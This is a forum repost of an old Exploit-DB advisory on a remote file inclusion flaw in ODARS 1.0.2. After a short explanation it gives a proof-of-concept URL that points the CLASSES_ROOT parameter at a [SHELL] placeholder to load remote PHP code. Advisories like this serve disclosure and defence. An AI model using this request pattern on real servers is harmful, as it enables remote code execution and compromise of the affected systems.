Exploit Open Digital Assets Repository System 1.0.2 - Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
31948
Проверка EDB
  1. Пройдено
Автор
CRACKER
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2008-06-22
Код:
source: https://www.securityfocus.com/bid/29881/info

Open Digital Assets Repository System (ODARS) is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

ODARS 1.0.2 is vulnerable; other versions may be affected as well. 

http://www.example.com/path/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=[SHELL]
 
Источник
www.exploit-db.com

Похожие темы